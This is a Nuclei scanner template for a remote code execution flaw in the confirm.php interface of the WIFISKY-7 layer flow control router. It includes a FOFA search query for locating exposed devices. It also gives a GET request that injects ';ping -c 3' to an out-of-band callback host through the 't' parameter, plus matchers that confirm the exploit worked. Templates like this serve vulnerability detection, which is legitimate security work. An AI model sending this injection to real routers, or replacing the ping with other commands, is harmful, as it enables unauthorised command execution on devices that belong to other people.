id: wifisky7-rce

info:
  name: WIFISKY-7 Layer Flow Control Router - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    There is an RCE vulnerability in the confirm.php interface of WIFISKY-7 layer flow control router
  reference:
    - https://github.com/wy876/POC/blob/main/WIFISKY-7%E5%B1%82%E6%B5%81%E6%8E%A7%E8%B7%AF%E7%94%B1%E5%99%A8confirm.php%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="WIFISKY 7层流控路由器"
  tags: wifisky,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/notice/confirm.php?t=%3bping+-c+3+{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: header
        words:
          - "L7Engine"

      - type: status
        status:
          - 200
# digest: 490a00463044022073b20dd539c2f97f4d77df2710669ac8a48b867a4ebe397c7c80a3a667a3c1df02200b4c8bc61b0fb453d1fff643e6880e69c4b91f3223e5cd23d5d22f8bdb6fa3fa:922c64590222798bb761d5b6d8e72950